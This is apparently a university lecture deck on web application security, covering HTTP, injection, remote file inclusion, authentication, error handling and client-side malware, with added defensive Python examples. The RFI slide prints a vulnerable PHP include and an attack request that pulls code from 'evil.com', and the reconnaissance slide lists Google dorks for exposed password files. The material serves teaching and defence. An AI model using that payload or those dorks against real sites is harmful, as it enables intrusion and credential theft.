CSC 482/582: Computer Security
Web Security
CSC 482/582: Computer Security Slide #1
Topics
1. Why web application security?
2. HTTP and web input types
3. Web Application Vulnerabilities
4. Client-side Attacks
5. Finding Web Vulnerabilities
Why Web Application Security?
Web Transactions
[Figure: Web Browser -> HTTP Request -> Network -> Web Server (OS); HTTP Response travels back to the browser]
HTTP: HyperText Transfer Protocol
Simple request/response protocol
  • Request methods: GET, POST, HEAD, etc.
  • Protocol versions: 1.0, 1.1
Stateless
  • Each request is independent of previous requests, i.e. request #2 doesn't know you authenticated in #1.
  • Applications are responsible for handling state.
HTTP Request
Request line: Method, URL, Protocol Version
  GET http://www.google.com/ HTTP/1.1
Headers:
  Host: www.google.com
  User-Agent: Mozilla/5.0 (Windows NT 5.1) Gecko/20060909 Firefox/1.5.0.7
  Accept: text/html, image/png, */*
  Accept-Language: en-us, en;q=0.5
  Cookie: rememberme=true; PREF=ID=21039ab4bbc49153:FF=4
Blank line, then no data for the GET method.
HTTP Response
Status line: Protocol Version, HTTP Response Code
  HTTP/1.1 200 OK
Headers:
  Cache-Control: private
  Content-Type: text/html
  Server: GWS/2.1
  Date: Fri, 13 Oct 2006 03:16:30 GMT
Blank line, then the web page data:
  <HTML> ... (page data) ... </HTML>
Different Perspectives
Client Side
  • HTTP requests may reveal private info.
  • HTTP responses may include malicious code (Java, ActiveX, Javascript).
Server Side
  • HTTP requests may contain malicious input.
  • HTTP requests may have forged authentication.
  • HTTP responses may be intercepted.
Web-based Input
  • Client and Server Perspectives
  • Types of Input
    • URL parameters
    • HTML
    • Cookies
    • Javascript
  • Cross-Site Scripting
URL Format
  <proto>://<user>@<host>:<port>/<path>?<qstr>
  • Whitespace marks the end of the URL
  • "@" separates userinfo from host
  • "?" marks the beginning of the query string
  • "&" separates query parameters
  • %HH represents the character with hex value HH
    • ex: %20 represents a space
Example:
  http://username:password@www.auth.com:8001/a%20spaced%20path
URL Parameters
  • Client controls the query string
    • Cannot limit values to those specified in the form
  • Any character can be URL-encoded
    • Even if it doesn't need to be.
  • Any valid format may be used to disguise the true destination of a URL
URL Obfuscation
IP address representations
  • Dotted quad (decimal, octal, hexadecimal)
  • Hexadecimal without dots (with left padding)
  • dword (32-bit int)
Examples: www.eecs.utoledo.edu
  • 131.183.19.14 (dotted quad)
  • 0xDEDA83B7130E (hexadecimal + padding)
  • 2209813262 (dword)
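Added example, not from the slides: a small URL checker that splits a URL the way the URL Format slide describes and reduces every host notation from the URL Obfuscation slide to one dotted quad, so a log reviewer or proxy sees the real destination. The sample URLs are constructed from the slide's own values; the padded hex form keeps its low 32 bits, matching the slide's example.

```python
import ipaddress
import re
from urllib.parse import urlsplit, unquote

# Added example (not from the slides): reduce the host of a URL to one dotted
# quad so that the notations on the "URL Obfuscation" slide cannot disguise
# the destination. The sample URLs below are constructed from the slide's
# examples; the padded hex form keeps its low 32 bits, as the slide does.

def _octet(p: str) -> int:
    """Decode one dotted-quad component given in decimal, octal (leading 0) or hex."""
    if p.startswith("0x"):
        return int(p[2:], 16)
    if len(p) > 1 and p.startswith("0"):
        return int(p, 8)
    return int(p)

def canonical_host(host: str) -> str:
    """Dotted quad for dword, padded-hex and mixed-radix quads; other hosts unchanged."""
    h = host.lower()
    try:
        m = re.fullmatch(r"0x([0-9a-f]+)", h)
        if m:                                     # hexadecimal without dots
            return str(ipaddress.IPv4Address(int(m.group(1), 16) & 0xFFFFFFFF))
        if h.isdigit():                           # dword, a 32-bit integer
            return str(ipaddress.IPv4Address(int(h)))
        parts = h.split(".")
        if len(parts) == 4:                       # dotted quad, any radix per octet
            octets = [_octet(p) for p in parts]
            if all(0 <= o <= 255 for o in octets):
                return ".".join(str(o) for o in octets)
    except ValueError:
        pass                                      # not an IP in any of these notations
    return h

def describe_url(url: str) -> dict:
    """Split a URL as the "URL Format" slide does and decode %HH escapes in the path."""
    u = urlsplit(url)
    return {"userinfo": u.username,               # text before "@" is not the host
            "host": canonical_host(u.hostname or ""),
            "port": u.port,
            "path": unquote(u.path),              # %20 -> space
            "query": u.query}

if __name__ == "__main__":
    for url in ("http://username:password@www.auth.com:8001/a%20spaced%20path",
                "http://www.eecs.utoledo.edu@2209813262/",   # "@" hides the real host
                "http://0xDEDA83B7130E/", "http://0203.0267.023.016/"):
        print(url, "->", describe_url(url))
```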
HTML Special Characters
  • "<" begins a tag
  • ">" ends a tag
    • some browsers will auto-insert a matching "<"
  • "&" begins a character entity
    • ex: &lt; represents the literal "<" character
  • Quotes (' and ") are used to enclose attribute values
Character Set Encoding
  • Default: ISO-8859-1 (Latin-1)
  • Char sets dictate which chars are special
  • UTF-8 allows multiple representations
  • Force Latin-1 encoding of a web page with:
    <META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
Hidden Fields
  <input type="hidden" name="user" value="james">
  • Used to propagate data between HTTP requests since the protocol is stateless
  • Clearly visible in HTML source
  • Form can be copied, modified to change hidden fields, then used to invoke the script
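Added example, not from the slides: since the client can copy the form and edit the hidden field, the server can bind each hidden value to an HMAC tag and reject a submission whose tag no longer matches. SECRET_KEY is a constructed placeholder, and html.escape is used so the value cannot break out of the attribute via the special characters from the previous slide.

```python
import hmac
import hashlib
from html import escape

# Added example (not from the slides): a hidden field is visible and editable
# in the client's copy of the form, so the server ties each value to a keyed
# hash and refuses any submission whose tag does not verify.
# SECRET_KEY is a constructed placeholder; keep the real one out of the page
# and out of the source tree.
SECRET_KEY = b"constructed-demo-key-replace-me"

def _tag(name: str, value: str, key: bytes) -> str:
    # Include the field name so a signed value cannot be moved to another field.
    return hmac.new(key, f"{name}\x00{value}".encode(), hashlib.sha256).hexdigest()

def sign_hidden(name: str, value: str, key: bytes = SECRET_KEY) -> str:
    """Return the value to embed, e.g. 'james.<64 hex chars>'."""
    return f"{value}.{_tag(name, value, key)}"

def verify_hidden(name: str, submitted: str, key: bytes = SECRET_KEY):
    """Return the original value if the tag verifies, otherwise None."""
    value, sep, tag = submitted.rpartition(".")   # the hex tag never contains "."
    if not sep:
        return None
    if not hmac.compare_digest(_tag(name, value, key), tag):
        return None
    return value

def render_hidden(name: str, value: str) -> str:
    """Emit the slide's <input type="hidden"> with a signed, HTML-escaped value."""
    return (f'<input type="hidden" name="{escape(name)}" '
            f'value="{escape(sign_hidden(name, value))}">')

if __name__ == "__main__":
    field = sign_hidden("user", "james")
    print(render_hidden("user", "james"))
    print(verify_hidden("user", field))                             # james
    print(verify_hidden("user", field.replace("james", "admin")))   # None: tampered
```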
Cookies
Server to Client:
  Content-type: text/html
  Set-Cookie: foo=bar; path=/; expires=Fri, 20-Feb-2004 23:59:00 GMT
Client to Server:
  Content-type: text/html
  Cookie: foo=bar
Web Input Summary
Client Side
  • URLs may not lead where they seem to.
  • Cookies can be used to track your browsing.
  • Pages may include malicious code (Java, ActiveX, Javascript).
Server Side
  • Cookies aren't confidential.
  • Hidden fields aren't secret.
  • Client may use own forms.
  • URLs can have any format.
  • POST data can have any format.
  • Cookies can have any format.
Web Application Vulnerabilities
Common Vulnerability Types
Injection
  • Injection attacks trick an application into including unintended commands in the data sent to an interpreter.
  • Interpreters
    • Interpret strings as commands.
    • Ex: SQL, shell (cmd.exe, bash), LDAP, XPath
  • Key Idea
    • Input data from the application is executed as code by the interpreter.
  • Discussed in detail in its own lecture.
Cross-Site Attacks
  • Attacker causes a legitimate web server to send user executable content (Javascript, Flash ActiveScript) of the attacker's choosing.
  • XSS used to obtain the session ID for a
    • Bank site (transfer money to attacker)
    • Shopping site (buy goods for attacker)
  • Key ideas
    • Attacker sends malicious code to the server.
    • Victim's browser loads code from the server and runs it.
  • Discussed in detail in its own lecture.
March 4, 2009 SIGCSE
Insecure Remote File Inclusion
  • Insecure remote file inclusion vulnerabilities allow an attacker to trick the application into executing code provided by the attacker on another site.
  • Dynamic code
    • Includes in PHP, Java, .NET
    • DTDs for XML documents
  • Key Idea
    • Attacker controls the pathname for inclusion.
PHP Remote Inclusion Flaw
A PHP product uses "require" or "include" statements, or equivalent statements, that use attacker-controlled data to identify code or HTML to be directly processed by the PHP interpreter before inclusion in the script.

  <?php // index.php
  include('config.php');
  include('include.php');
  // Script body
  ?>

  <?php // config.php
  $server_root = '/my/path';
  ?>

  <?php // include.php
  // Nothing sets $server_root when include.php is requested on its own; with
  // PHP's register_globals enabled, a query parameter of the same name fills it in.
  include($server_root . '/someotherfile.php');
  ?>

Attack request, which makes include.php fetch and execute code from another site:
  GET /include.php?server_root=http://evil.com/command.txt
Mitigating Remote File Inclusion
1. Turn off remote file inclusion.
2. Do not run code from uploaded files.
3. Do not use user-supplied paths.
4. Validate all paths before loading code.
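Added example, not from the slides: the four mitigation steps applied to a loader that plays the role of the slide's include.php, written in Python rather than PHP. The base directory is fixed on the server (the slide's /my/path), the request may only name a file from a constructed whitelist, URLs are refused outright, and the resolved path is checked against the base directory before anything is loaded; it assumes uploaded files are stored outside that directory.

```python
import os
from urllib.parse import urlsplit

# Added example (not from the slides): the mitigation steps applied to a
# loader replacing the slide's include.php, where $server_root came from the
# request. Here the base directory is fixed on the server, the client may only
# name a file from a whitelist, and the resolved path is checked before
# anything is loaded. "/my/path" is the slide's value; ALLOWED is constructed.

BASE_DIR = "/my/path"
ALLOWED = frozenset({"someotherfile.php", "header.php"})

def resolve_include(requested: str, base_dir: str = BASE_DIR, allowed=ALLOWED):
    """Return the absolute file to include, or None when the request is rejected."""
    # Step 1: remote inclusion is off, so anything carrying a URL scheme is refused.
    if urlsplit(requested).scheme:
        return None
    # Steps 2 and 3: the client supplies a bare whitelisted file name, never a path
    # (assumes uploads are stored outside base_dir, so they can never be named here).
    name = os.path.basename(requested)
    if name != requested or name not in allowed:
        return None
    # Step 4: validate that the resolved path stays under base_dir before loading.
    root = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, full]) != root:
        return None
    return full

if __name__ == "__main__":
    for req in ("someotherfile.php", "http://evil.com/command.txt",
                "../../etc/passwd", "command.txt"):
        print(req, "->", resolve_include(req))
```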
Authentication
  • Authentication is the process of determining a user's identity.
  • Key Ideas
    • HTTP is a stateless protocol.
    • Every request must be authenticated.
    • Use username/password on the first request.
    • Use session IDs on subsequent queries.
Authentication Attacks
  • Sniffing passwords
  • Guessing passwords
  • Identity management attacks
  • Replay attacks
  • Session ID fixation
  • Session ID guessing
Identity Management Attacks
Auth requires identity management
  • User registration
  • Password changes and resets
Mitigations
  • Use CAPTCHAs to protect registration.
  • Don't use easy-to-guess secret questions.
  • Don't allow the attacker to reset the e-mail address that the new password is sent to.
Session ID Guessing
Do session IDs show a pattern?
  • How does changing the username change the ID?
  • How do session IDs change with time?
Brute forcing session IDs
  • Use a program to try 1000s of session IDs.
Mitigating guessing attacks
  • Use a large key space (128+ bits).
  • Use a cryptographically random algorithm.
Mitigating Authentication Attacks
  • Use SSL to prevent sniffing attacks.
  • Require strong passwords.
  • Use secure identity management.
  • Use a secure session ID mechanism.
    • IDs chosen at random from a large space.
    • Regenerate session IDs with each request.
    • Expire session IDs in a short time.
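Added example, not from the slides: a session table that implements the session ID points on this slide and the previous one. IDs are 128 bits from the OS CSPRNG, a client-supplied ID is never adopted (login always issues a fresh one, so fixation fails), every authenticated request rotates the ID and invalidates the old one, and idle sessions expire. The timeout value and the injectable clock are constructed for the demonstration.

```python
import secrets
import time

# Added example (not from the slides): a session table following the
# "Mitigating Authentication Attacks" slide. Session IDs are 128 bits from
# the OS CSPRNG, a client-supplied ID is never adopted (so fixation fails),
# each authenticated request gets a fresh ID and the old one stops working,
# and idle sessions expire. TTL and the injectable clock are constructed.

SESSION_TTL = 15 * 60   # seconds; constructed value

class SessionStore:
    def __init__(self, ttl: float = SESSION_TTL, clock=time.time):
        self.ttl, self.clock = ttl, clock
        self._sessions = {}   # session id -> (username, last seen)

    @staticmethod
    def _new_id() -> str:
        return secrets.token_hex(16)   # 16 random bytes = 128-bit key space

    def login(self, username: str, password_ok: bool):
        """First request: username/password checked elsewhere; issue a brand-new ID."""
        if not password_ok:
            return None
        sid = self._new_id()
        self._sessions[sid] = (username, self.clock())
        return sid

    def authenticate(self, sid: str):
        """Subsequent requests: accept the ID once, then rotate it.
        Returns (username, new session id) or None if unknown or expired."""
        entry = self._sessions.pop(sid, None)   # presented ID is consumed either way
        if entry is None:
            return None
        username, last_seen = entry
        if self.clock() - last_seen > self.ttl:
            return None                         # expired: do not re-issue
        new_sid = self._new_id()
        self._sessions[new_sid] = (username, self.clock())
        return username, new_sid

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)

if __name__ == "__main__":
    store = SessionStore()
    sid = store.login("james", password_ok=True)
    user, sid2 = store.authenticate(sid)
    print(user, sid != sid2, store.authenticate(sid))   # james True None
```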
Access Control
  • Access control determines which users have access to which system resources.
  • Levels of access control
    • Site
    • URL
    • Function (parameters)
    • Data
Mitigating Broken Access Control
1. Check every access.
2. Use a whitelist model at every layer.
3. Do not rely on client-level access control.
4. Do not rely on security through obscurity.
Improper Error Handling
  • Applications can unintentionally leak information about configuration, architecture, or sensitive data when handling errors improperly.
  • Errors can provide too much data
    • Stack traces
    • SQL statements
    • Subsystem errors
    • User typos, such as passwords.
Example of Improper Error Handling
  MySQL error with query SELECT COUNT(*) FROM nucleus_comment as c WHERE c.citem=90: Can't open file: 'nucleus_comment.MYI' (errno: 145)
  Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/exalt2/public_html/username/nucleus/libs/COMMENTS.php on line 124
Mitigating Improper Error Handling
1. Catch all exceptions.
2. Check all error codes.
3. Wrap the application with a catch-all handler.
4. Send a user-friendly message to the user.
5. Store details for debugging in log files.
6. Don't log passwords or other sensitive data.
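Added example, not from the slides: a catch-all wrapper implementing steps 3 to 6. The user receives only a generic message with a reference number; the stack trace (which here carries a MySQL-style message with the SQL text, modelled on the previous slide) and the request parameters go to the log with credential-looking parameters masked. The handler, request and log sink are constructed for the demonstration.

```python
import logging
import re
import traceback
import uuid
from io import StringIO

# Added example (not from the slides): a catch-all wrapper that implements
# steps 3 to 6 of the mitigation list. The client receives a generic message
# plus a reference number; the stack trace and request parameters go to the
# log, with credential-like parameters masked. Handler and request are constructed.

SENSITIVE = re.compile(r"(?i)pass(word|wd)?|pwd|secret|token|ssn")

def redact(params: dict) -> dict:
    """Copy of params with the values of credential-looking names replaced."""
    return {k: ("[REDACTED]" if SENSITIVE.search(k) else v) for k, v in params.items()}

def handle_request(handler, params: dict, log=logging.getLogger("app")):
    """Run handler(params); on any exception log the details and return a friendly 500."""
    try:
        return 200, handler(params)
    except Exception:           # catch-all: no stack trace, SQL or path reaches the client
        ref = uuid.uuid4().hex[:12]
        log.error("ref=%s params=%s\n%s", ref, redact(params), traceback.format_exc())
        return 500, f"Sorry, something went wrong. Reference: {ref}"

def demo():
    """Run a failing login handler and return (status, body shown to user, text logged)."""
    buf = StringIO()
    log = logging.getLogger("app.demo")
    log.addHandler(logging.StreamHandler(buf))
    log.propagate = False

    def login(params):
        # constructed failure modelled on the slide's MySQL error, SQL text and all
        raise RuntimeError("Can't open file: 'users.MYI' for SELECT * FROM users "
                           f"WHERE name='{params['user']}'")

    status, body = handle_request(login, {"user": "james", "password": "hunter2"}, log)
    return status, body, buf.getvalue()

if __name__ == "__main__":
    status, body, logged = demo()
    print(status, body)
    print(logged)
```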
Insecure Storage
  • Storing sensitive data without encrypting it, using a weak encryption algorithm, or using a strong encryption system improperly.
  • Problems
    • Not encrypting sensitive data.
    • Using home-grown cryptography.
    • Insecure use of weak algorithms.
    • Storing keys in code or unprotected files.
Storage Recommendations
Hash algorithms
  • MD5 and SHA1 look insecure.
  • Use SHA256.
Encrypting data
  • Use AES with 128-bit keys.
Key generation
  • Generate random keys.
  • Use a secure random source.
Mitigating Insecure Storage
1. Use well-studied public algorithms.
2. Use truly random keys.
3. Store keys in protected files.
4. Review code to ensure that all sensitive data is being encrypted.
5. Check the database to ensure that all sensitive data is being encrypted.
Insecure Communication
  • Applications fail to encrypt sensitive data in transit from client to server and vice versa.
  • Need to protect
    • User authentication and session data.
    • Sensitive data (CC numbers, SSNs)
  • Key Idea
    • Use SSL for all authenticated connections.
Mitigating Insecure Communication
1. Use SSL for all authenticated sessions.
2. Use SSL for all sensitive data.
3. Verify that SSL is used with automated vulnerability scanning tools.
Client-side Attacks
  • Buffer Overflow
    • 2004 iframe
    • 2004-05 jpeg
  • Remote Code
    • ActiveX
    • Flash
    • Javascript
ActiveX
Executable code downloaded from the server
  • Activated by the HTML object tag.
  • Native code binary format.
Security model
  • Digital signature authentication
  • Zone-based access control
  • No control once execution starts
Java
  • Digital signature authentication
  • Sandbox
Components
  • Byte-code verifier
  • Class loader
  • Security manager
Sandbox Limits
  • Cannot read/write files.
  • Cannot start programs.
  • Network access limited to the originating host.
MPack Browser Malware
1. User visits site.
2. Response contains an iframe.
3. Iframe code causes the browser to make a request.
4. Request is redirected to the MPack server.
5. Server identifies OS and browser, sends an exploit that will work for the client configuration.
6. Exploit causes the browser to send a request for code.
7. MPack downloader is sent to the user and begins downloading other malware.
MPack
Commercial underground PHP software
  • Sold for $700-1000.
  • Comes with one year of technical support.
  • Updated exploits can be purchased for $50-150.
Infection Techniques
  • Hacking into websites and adding iframes.
  • Sending HTML mail with iframes.
  • Typo-squatting domains.
  • Using Google Ads to draw traffic.
Client Protection
  • Disable ActiveX and Java.
  • Use NoScript to limit Javascript.
  • Run the browser with least privilege.
  • Use a browser sandbox:
    • VMWare Virtual Browser Appliance
    • Protected Mode IE (Windows Vista)
  • Go to sites directly instead of using links.
  • Use plain text e-mail instead of HTML.
  • Patch your browser regularly.
  • Use a personal firewall.
Web Reconnaissance
Google Hacking
  • "Index of" +passwd
  • "Index of" +password.txt
  • filetype:htaccess user
  • allinurl:_vti_bin shtml.exe
Web Crawling
  • Santy Worm used Google to find vulnerable servers.
  • wget --mirror http://www.w3.org/ -o /mirror/w3
Proxies and Vulnerability Scanners
  • Achilles
  • OWASP WebScarab
  • Paros Proxy
  • SPI Dynamics WebInspect
[Figure: Web Browser <-> Web Proxy <-> Web Server; the proxy lets the tester edit web data: URL, Cookies, Form Data]
Achilles Proxy Screenshot
Key Points
  • All input can be dangerous
    • URLs, Cookies, Executable content
  • Consider both client and server security.
  • SSL is not a panacea
    • Confidentiality + integrity of data in transit.
    • Input-based attacks can be delivered via SSL.
  • Top Vulnerabilities
    • Cross-Site Scripting
    • SQL Injection
    • Remote File Inclusion